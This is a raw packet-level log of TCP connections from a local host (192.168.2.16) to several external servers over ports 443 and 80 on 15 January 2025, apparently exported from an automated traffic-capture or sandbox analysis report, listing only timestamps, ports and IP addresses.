                                                                                                                                            Jan 15, 2025 19:14:44.876710892 CET49926443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:44.876723051 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.877043009 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.877489090 CET49926443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:44.877548933 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.878068924 CET49926443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:44.878068924 CET49926443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:44.878108978 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.888382912 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.904093981 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.904159069 CET49923443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.904176950 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.904186010 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.904239893 CET49923443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.904309034 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.904366016 CET49923443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.904381037 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.904416084 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.904587984 CET49923443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.904612064 CET49923443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.904629946 CET44349923104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.924325943 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.924510956 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.924583912 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.924598932 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.924674988 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.924736023 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.924742937 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.925134897 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.925196886 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.925204992 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.925298929 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.925405979 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.925415993 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.925446987 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.925504923 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.925534964 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.926172018 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.926233053 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.926240921 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.926331997 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.926414967 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.926440954 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.926449060 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.926489115 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.927124023 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.927293062 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.927372932 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.927381039 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.927504063 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.927560091 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.927567005 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.966646910 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.966731071 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:44.966744900 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.968352079 CET4968080192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:14:45.013386011 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013479948 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.013492107 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013578892 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013626099 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.013637066 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013739109 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013804913 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.013812065 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013833046 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013887882 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.013894081 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013926983 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013948917 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.013958931 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.013984919 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.014087915 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.014167070 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.014173985 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.014430046 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.014514923 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.014523029 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.014538050 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.014575958 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.014581919 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.014611006 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.015408993 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.015474081 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.015482903 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.015501976 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.015556097 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.015563011 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.015587091 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.015646935 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.015654087 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.015769958 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.016213894 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.016268969 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.016364098 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.016448021 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.016489983 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.016489983 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.016499043 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.017235994 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.017307997 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.017316103 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.017368078 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.055437088 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.055977106 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.065418959 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.066514015 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.066622019 CET49926443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:45.066744089 CET49926443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:45.066764116 CET4434992635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.101547956 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.101639986 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.101713896 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.101839066 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.101864100 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.101872921 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.101929903 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.101934910 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102006912 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.102015018 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102157116 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102193117 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.102199078 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102257013 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102299929 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.102299929 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.102309942 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102360010 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102433920 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.102441072 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102453947 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102539062 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.102545023 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.102690935 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103032112 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.103138924 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.103173018 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103182077 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.103255033 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103260994 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.103336096 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103343010 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.103476048 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.103518963 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103518963 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103629112 CET49924443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.103642941 CET44349924104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.105846882 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.105905056 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.105997086 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.106189013 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.106208086 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.281238079 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.281438112 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.281539917 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.281574011 CET49927443192.168.2.1635.190.80.1
                                                                                                                                            Jan 15, 2025 19:14:45.281605005 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.281630993 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.281917095 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.281939983 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.281965017 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.282416105 CET49927443192.168.2.1635.190.80.1
                                                                                                                                            Jan 15, 2025 19:14:45.282491922 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.282614946 CET49927443192.168.2.1635.190.80.1
                                                                                                                                            Jan 15, 2025 19:14:45.319356918 CET49678443192.168.2.1620.189.173.10
                                                                                                                                            Jan 15, 2025 19:14:45.323365927 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.426944971 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.427022934 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.427069902 CET49927443192.168.2.1635.190.80.1
                                                                                                                                            Jan 15, 2025 19:14:45.427206993 CET49927443192.168.2.1635.190.80.1
                                                                                                                                            Jan 15, 2025 19:14:45.427227020 CET4434992735.190.80.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.591604948 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.592123032 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.592199087 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.592573881 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.593127012 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.593214989 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.593358994 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.635341883 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.638359070 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.764280081 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.764353037 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.764547110 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.765055895 CET49928443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.765099049 CET44349928104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.776743889 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.778631926 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.778660059 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.779182911 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.780230045 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.780311108 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.781043053 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.827338934 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.906478882 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.906594992 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.906667948 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.906704903 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.906724930 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:45.906774044 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.908919096 CET49929443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:45.908938885 CET44349929104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.180181026 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.180282116 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.180603981 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.180896044 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.180938005 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.634536028 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.634823084 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.634885073 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.635253906 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.635600090 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.635679007 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.635771990 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.683342934 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.752377987 CET49673443192.168.2.16204.79.197.203
                                                                                                                                            Jan 15, 2025 19:14:46.777231932 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.777322054 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.777403116 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.778099060 CET49930443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.778141022 CET44349930104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.780674934 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.780730009 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:46.780797005 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.781002998 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:46.781022072 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.121970892 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.122025013 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.122102022 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.122410059 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.122422934 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.254456997 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.254724979 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.254791021 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.255172014 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.255567074 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.255646944 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.255700111 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.295381069 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.295425892 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.403074980 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.403151035 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.403235912 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.403758049 CET49931443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.403799057 CET44349931104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.588990927 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.589296103 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.589359045 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.589824915 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.590219021 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.590317011 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.590367079 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.590456963 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.590502024 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.590604067 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.590643883 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845626116 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845681906 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845719099 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845756054 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845778942 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845829010 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.845897913 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.845932961 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.845957994 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.846071005 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.846534014 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.846568108 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.846601963 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.846616983 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.846690893 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.850795031 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.900408030 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.900437117 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934349060 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934398890 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934431076 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934468985 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.934488058 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934525013 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.934823990 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934861898 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.934889078 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.934900999 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.935002089 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.935017109 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.935028076 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.935095072 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.935097933 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.935158968 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.935293913 CET49932443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.935327053 CET44349932104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.937736988 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.937829971 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.937936068 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.938194990 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:47.938232899 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.417695999 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.418066025 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:48.418101072 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.418484926 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.418787956 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:48.418859005 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.418921947 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:48.463330984 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.568722963 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:48.568792105 CET44349933104.18.95.41192.168.2.16
